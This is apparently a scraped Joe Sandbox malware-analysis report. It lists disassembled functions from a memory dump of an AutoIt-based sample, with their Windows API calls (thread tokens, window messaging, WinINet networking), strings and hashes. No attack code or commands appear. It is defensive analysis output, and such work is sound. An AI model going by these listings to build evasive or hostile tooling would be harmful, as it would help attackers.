Opcode Fuzzy Hash: 36f6dfc4e58a9c21e80ec343549248c972560541c3c243264eb6a45ae1c5b665
Instruction Fuzzy Hash: 74F0BE32045218BBDB12AFD0AC0DFDE3F69AF05321F048100FA11610E283B45556DBA9

Function 00A4AA52 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00A4AA6F
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A4AA82
GetCurrentThreadId.KERNEL32 ref: 00A4AA89
AttachThreadInput.USER32(00000000), ref: 00A4AA90

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: d0a3e5e2c05ed9d27b09baa594298da832d1ecf1fa78bb260081274b1a3be03d
Instruction ID: c0d85e61e428aefcc1530ae6c9e756fa7df852b03a1f3d0e4e3f394bfe0c3423
Opcode Fuzzy Hash: d0a3e5e2c05ed9d27b09baa594298da832d1ecf1fa78bb260081274b1a3be03d
Instruction Fuzzy Hash: 3EE03936581228BADB619FE29D0CEE77F1CEF617A1F008021F50984050D7B1C555CBA0

Function 009F25F4 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 009F260D
SetTextColor.GDI32(?,000000FF), ref: 009F2617
SetBkMode.GDI32(?,00000001), ref: 009F262C
GetStockObject.GDI32(00000005), ref: 009F2634
GetWindowDC.USER32(?,00000000), ref: 00A2C1C4
GetPixel.GDI32(00000000,00000000,00000000), ref: 00A2C1D1
GetPixel.GDI32(00000000,?,00000000), ref: 00A2C1EA
GetPixel.GDI32(00000000,00000000,?), ref: 00A2C203
GetPixel.GDI32(00000000,?,?), ref: 00A2C223
ReleaseDC.USER32(?,00000000), ref: 00A2C22E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 3c1afa76a61becceb6ae4889555558eba605ccc6c5c61e6ed76177b664f24eee
Instruction ID: 3d0303f17310e73500b59632f829088d1377bc63f6130373afc6127057ebf16e
Opcode Fuzzy Hash: 3c1afa76a61becceb6ae4889555558eba605ccc6c5c61e6ed76177b664f24eee
Instruction Fuzzy Hash: E8E06D32504248BFEB619FA8BC4DBE83B11EB15332F048366FA69880E187714A95DB21

Function 00A49330 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00A49339
OpenThreadToken.ADVAPI32(00000000,?,?,?,00A48F04), ref: 00A49340
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00A48F04), ref: 00A4934D
OpenProcessToken.ADVAPI32(00000000,?,?,?,00A48F04), ref: 00A49354

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: f8c2728d819eaf404cb16839bd1ee41939cd4ad7b8299194a8a24533596d4067
Instruction ID: 40012575be25f511024bb6bb2699618c269de972d0a09fc0f3e5155f661b3f40
Opcode Fuzzy Hash: f8c2728d819eaf404cb16839bd1ee41939cd4ad7b8299194a8a24533596d4067
Instruction Fuzzy Hash: 98E086366012119FD7A09FF15D0DF573B7CEF51791F114818B245CD090E634A44AC750

Function 00A30679 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A30679
GetDC.USER32(00000000), ref: 00A30683
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A306A3
ReleaseDC.USER32(?), ref: 00A306C4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 49dcc5548ad46b9ddc3d82054a56cfba361080212f3a81f64b559294162b4bef
Instruction ID: c1be19908a9d117b24cdf0fb5258fde00de61509385ce658dfebeaa867db2ba5
Opcode Fuzzy Hash: 49dcc5548ad46b9ddc3d82054a56cfba361080212f3a81f64b559294162b4bef
Instruction Fuzzy Hash: ACE0E572800204EFCB819FA0D808A6DBBB5AF88311F118425F95AA7250EBB895569F50

Function 00A3068D Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 00A3068D
GetDC.USER32(00000000), ref: 00A30697
GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A306A3
ReleaseDC.USER32(?), ref: 00A306C4

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: ee6a5c4d2fb87c3674df1d0d2ed3f61ab00258e0520bc538cbaac15eee3cf3e3
Instruction ID: a3a02d28c02e799b0a84689c5dd400cc60e8aeea3b042014d0a9d46fb73c7d59
Opcode Fuzzy Hash: ee6a5c4d2fb87c3674df1d0d2ed3f61ab00258e0520bc538cbaac15eee3cf3e3
Instruction Fuzzy Hash: EEE01A72800204AFCB819FA0D808A6DBFF1BF8C311F108424FA59A7250EB7895568F50

Function 00A4BE8C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00A4C057

Strings

Container, xrefs: 00A4BFD4
AutoIt3GUI, xrefs: 00A4BFCF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: d0da5c2bb89469b700f3dd0869382c2685bdc37d0eda383a479ef63ca9b3304a
Instruction ID: 88918a885ce9069f7cd1c06bef1ed29a942aa0f949c9bdd0238242d660039fd1
Opcode Fuzzy Hash: d0da5c2bb89469b700f3dd0869382c2685bdc37d0eda383a479ef63ca9b3304a
Instruction Fuzzy Hash: 69914A74600201EFDB54DF68C884A6ABBF5FF89710F10856DF94ACB691DBB1E845CB60

Function 00A5B5EF Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00A0436A: _wcscpy.LIBCMT ref: 00A0438D

Part of subcall function 009F4D37: __itow.LIBCMT ref: 009F4D62
Part of subcall function 009F4D37: __swprintf.LIBCMT ref: 009F4DAC

__wcsnicmp.LIBCMT ref: 00A5B670
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00A5B739

Strings

LPT, xrefs: 00A5B66A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: cb93f151878453369bed8a1a03a96a948cac0da3cc3d6ce1d365001471e58718
Instruction ID: 81e9e99a87b9780acb0c90c792c0030cf83a6e1f026382ad465d84e639a6ed37
Opcode Fuzzy Hash: cb93f151878453369bed8a1a03a96a948cac0da3cc3d6ce1d365001471e58718
Instruction Fuzzy Hash: 28616F75A10219EFCB14DF98C891EAEB7B4FF48311F108159F906AB391DB70AE44CBA0

Function 009FE00D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 009FE01E
GlobalMemoryStatusEx.KERNEL32(?), ref: 009FE037

Strings

@, xrefs: 009FE02B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 6c938b97fed11fd1452b3b20a9b7c30efbab666c6d08c706c741cf2ba306afe1
Instruction ID: 88ebd400344d9303c2d6a77e33417b835df76f96c78d4b48c0a9984f2bcaf7f3
Opcode Fuzzy Hash: 6c938b97fed11fd1452b3b20a9b7c30efbab666c6d08c706c741cf2ba306afe1
Instruction Fuzzy Hash: 4B5148725087489BE320AF50EC86BAFBBF8FBC4314F51484DF2D8411A1EB709529CB16

Function 00A78096 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 00A78186
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A7819B

Strings

', xrefs: 00A780EF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: c3369ea35951daf1d385e67c92e0378ec95fd08177067a5edc17cc454a68736e
Instruction ID: d1c3cbc5c69cfdb1f379649b859b2997667b4a38f8a3264ec92b61a24afcc846
Opcode Fuzzy Hash: c3369ea35951daf1d385e67c92e0378ec95fd08177067a5edc17cc454a68736e
Instruction Fuzzy Hash: 18412A74A412099FDB10CF68CC85BDA7BB5FF08300F50816AE908AB351DB75A956CF90

Function 00A62C5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A62C6A
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00A62CA0

Strings

|, xrefs: 00A62C71

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: de0a2da120dc8417d077f4a3159012587b0efdb21dd266c3cb0f5b99b51023b7
Instruction ID: 72e7337d962b2840aca10fd1cf0984584c3e5dfbaa4cdb56a58711634c81b8c6
Opcode Fuzzy Hash: de0a2da120dc8417d077f4a3159012587b0efdb21dd266c3cb0f5b99b51023b7
Instruction Fuzzy Hash: BB313C71C00119EBCF01EFA1DD85AEEBFB9FF08300F104019F915AA162EB319956DBA0

Function 00A77088 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00A7713C
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00A77178

Strings

static, xrefs: 00A770D8

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: 7a990fa3ea11312b5386004f339365f5008813559460c244b41df00307e53155
Instruction ID: ede77fc06d22cd0de1188509e28bcde024925742e720e886ff4883b4c363ee71
Opcode Fuzzy Hash: 7a990fa3ea11312b5386004f339365f5008813559460c244b41df00307e53155
Instruction Fuzzy Hash: A9317E71110604AAEB11DF74CC80FFB77A9FF88724F10D619F999971A1DA31AC81CB60

Function 00A53049 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A530B8
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00A530F3

Strings

0, xrefs: 00A530B1

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: e2472debc69aef1b1561bf56ea25500e002b3a8bf94b9c30aca6438c81b23c86
Instruction ID: fce0286c40f02400de6a7d466d164b029a22e0f86b762ee263e304c37f810b28
Opcode Fuzzy Hash: e2472debc69aef1b1561bf56ea25500e002b3a8bf94b9c30aca6438c81b23c86
Instruction Fuzzy Hash: C731E333600205ABEF248F68C985BEEBBB8FB853C1F144119ED81A61A1D7709B48CB50

Function 00A640B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 00A64132

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Strings

AUTOITCALLVARIABLE%d, xrefs: 00A64124
, $, xrefs: 00A64172

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: a706802ee7ac3968110481329d7cbc86fa18b9029cb0ee94f05a063545d8d71c
Instruction ID: 6339b84b857920ee3384a72fe74249e9e880a4e6798dd3950f7e13b699dc4456
Opcode Fuzzy Hash: a706802ee7ac3968110481329d7cbc86fa18b9029cb0ee94f05a063545d8d71c
Instruction Fuzzy Hash: E0218C70A0021CAFCF15EFA4D982AEE77B5EF5A340F004455F905A7282DB70AA85CBA1

Function 00A76CF9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00A76D86
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00A76D91

Strings

Combobox, xrefs: 00A76D53

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 73a294d1f94ab0c1e5c81be6c9f4fbff85a6601cece4fe29d4f92912ca30e235
Instruction ID: 0e69f3b3d2b6db735b5bdd801dc54dd37ff25c60812b0df3596b78ac70ec0af9
Opcode Fuzzy Hash: 73a294d1f94ab0c1e5c81be6c9f4fbff85a6601cece4fe29d4f92912ca30e235
Instruction Fuzzy Hash: 13118271320A08BFEF619F54DC81FFB3B6AEB88364F11C125F9189B291D6719C518760

Function 00A7722C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 009F2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 009F214F
Part of subcall function 009F2111: GetStockObject.GDI32(00000011), ref: 009F2163
Part of subcall function 009F2111: SendMessageW.USER32(00000000,00000030,00000000), ref: 009F216D

GetWindowRect.USER32(00000000,?), ref: 00A77296
GetSysColor.USER32(00000012), ref: 00A772B0

Strings

static, xrefs: 00A77273

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 71c2716b950880c54b3706bface6c302b868a7be85007fcfc7f2dd2a3f3ccb4b
Instruction ID: 67e3a6e11658370ab119a74a33c89c7eaec83f73c9ef948fb351dacc364e3706
Opcode Fuzzy Hash: 71c2716b950880c54b3706bface6c302b868a7be85007fcfc7f2dd2a3f3ccb4b
Instruction Fuzzy Hash: BC21177261420AAFDB04DFA8CC45EFE7BA8EB48314F008618FD59D3251E635A8519BA0

Function 00A76F45 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 00A76FC7
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00A76FD6

Strings

edit, xrefs: 00A76FAB

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: 2f27a4c1f4628596c18e2a81961a3a4b03cc2e2b152041ad891d264c599b7424
Instruction ID: f1bd08f0824fab0d4d68ae786e2b09c670596d4bbcc7435ad26dbbbcddb8afc0
Opcode Fuzzy Hash: 2f27a4c1f4628596c18e2a81961a3a4b03cc2e2b152041ad891d264c599b7424
Instruction Fuzzy Hash: 7C116A71100608ABEB509F64EC90FFB3B6AEB04368F10C724F968971E0C772DC919B60

Function 00A53156 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A531C9
GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00A531E8

Strings

0, xrefs: 00A531BF

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 4376ce983d944f1155ff0e06a17204c0a841b6ba7c1ca20ddca9c457d960dc94
Instruction ID: 9b313a418044c7e03cb1b2cabbf3ffbf409b3e3116a67e77210d24f9d1c5fd30
Opcode Fuzzy Hash: 4376ce983d944f1155ff0e06a17204c0a841b6ba7c1ca20ddca9c457d960dc94
Instruction Fuzzy Hash: 1A11D033900514ABDF20DBA8DC45BAD77B8BB85392F144225EC06A72A0D770AF09CBA1

Function 00A628A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A628F8
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00A62921

Strings

<local>, xrefs: 00A628E9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: ba4819f41ad004b19f4df7e32f8e16b5de7892a55e8a9e086dfa0ca0c2465f4e
Instruction ID: 31d34c1efdd03178d263947cca6f3331f1f743e3d3e7388ddd8ff81ae332191f
Opcode Fuzzy Hash: ba4819f41ad004b19f4df7e32f8e16b5de7892a55e8a9e086dfa0ca0c2465f4e
